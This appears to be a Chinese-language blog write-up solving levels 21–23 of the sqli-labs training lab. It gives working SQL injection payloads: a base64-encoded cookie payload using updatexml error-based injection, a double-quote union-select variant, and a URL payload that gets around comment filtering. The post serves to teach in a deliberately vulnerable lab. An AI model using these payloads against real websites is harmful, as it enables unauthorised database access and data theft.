QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

sqli-labs-第21关->第23关

04 Sep 2019 » security

[TOC]

sqli-labs-第16关->第20关

sqli-labs 第21关

查看源代码

sqli-labs-21-0

进行正常登陆后抓包发现 COOKIE 中 unmae 进行了 base64 编码 带入sql 拼接中进行了base64解码 RT:

sqli-labs-21

利用payload (就是将你的sql语句进行base64编码带入cookie中 ) RT:

Cookie: uname=YWRtaW4xJyBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHgzYSwoZGF0YWJhc2UoKSkpLDApLCcnLCcnKSM=

# 原语句:
# Cookie: uname=admin1' or updatexml(1,concat(0x3a,(database())),0),'','')#

sql-labs-20-1

sqli-labs 第22关

sqli-labs-22

跟第 21 关思路一样就是多了一个 双引号包裹起来直接闭合掉即可

Cookie: uname=YWRtaW4xIiB1bmlvbiBzZWxlY3QgMSwyLHZlcnNpb24oKSBsaW1pdCAxLDEj

# 原语句:
# Cookie: uname=admin1" union select 1,2,version() limit 1,1#

sqli-labs-22-1

sqli-labs 第23关

查看源代码:

sqli-labs-23

当检查到有 # 或者 – 都会替换为$replace 变量中的内容,而这个变量为空,所以替换为空,再赋值,直接闭合掉后面的就好了 RT:

http://192.168.1.101/sqli-labs/Less-23/?id=0' union select 1,version(),3 and 'aaa'='aaa

sqli-labs-23-1